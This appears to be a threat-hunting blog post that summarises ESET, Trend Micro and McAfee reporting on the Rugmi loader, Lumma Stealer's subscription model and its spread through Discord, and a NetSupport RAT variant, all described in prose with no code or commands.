Enter the Cyber Battlefield: The Rise of Sneaky Malware Loaders and Stealthy Stealers — A Dive into ESET’s Trojan Saga, Discord’s Dark Side, and McAfee’s RAT Revelation.

Happy Threat Hunt Thursday!

A fresh strain of malware loaders has surfaced, ushering in a wave of information-stealing threats like Lumma Stealer (also known as LummaC2), Vidar, RecordBreaker (aka Raccoon Stealer V2), and Rescoms, according to cybersecurity experts at ESET.

The trojan, dubbed Win/TrojanDownloader.Rugmi by ESET, is a multifaceted threat comprising a downloader for encrypted payloads, an internal resource-based loader, and an external file-based loader to execute the payload, as stated in the Threat Report H2 2023 from the company.

Data gathered from ESET’s telemetry indicates a noticeable surge in detections of the Rugmi loader during October and November 2023, skyrocketing from a few daily instances to hundreds per day.

Typically distributed under a malware-as-a-service (MaaS) model, stealers like Lumma Stealer are available for subscription to other threat actors. For example, Lumma Stealer is being peddled in underground forums at $250 per month, with a top-tier plan priced at $20,000, granting purchasers access to the source code and resale rights.

Connections have been drawn between the codebases of Mars, Arkei, Vidar stealers, and the creation of Lumma, indicating a potential repurposing of existing code.

To evade detection, this off-the-shelf tool employs various distribution methods, spanning from malvertising and fake browser updates to pirated installations of popular software such as VLC media player and OpenAI ChatGPT.

An alternate tactic observed involves the abuse of Discord’s content delivery network (CDN) for hosting and disseminating malware. Trend Micro’s October 2023 report highlighted how compromised and random Discord accounts are utilized to send direct messages offering recipients $10 or a Discord Nitro subscription in exchange for aiding a supposed project. Those agreeing to the offer receive an executable file from Discord’s CDN, disguised as iMagic Inventory but containing the Lumma Stealer payload.

“Easily accessible malware tools contribute significantly to the proliferation of malicious activities, even among less technically proficient threat actors,” notes ESET. “The expanding range of functions offered by Lumma Stealer further enhances its appeal as a product.”

Meanwhile, McAfee Labs uncovered a new iteration of NetSupport RAT, originating from its legitimate counterpart NetSupport Manager. This variant, employed by initial access brokers, is used for data collection and additional actions on targeted victims.

McAfee outlined the attack’s initial phase, which involves obfuscated JavaScript files serving as an entry point. The JavaScript initiates PowerShell commands to fetch remote control and stealers from a server controlled by threat actors. The campaign primarily targets the U.S. and Canada, showcasing the evolving tactics employed by cybercriminals.

Happy Hunting!

-threathuntress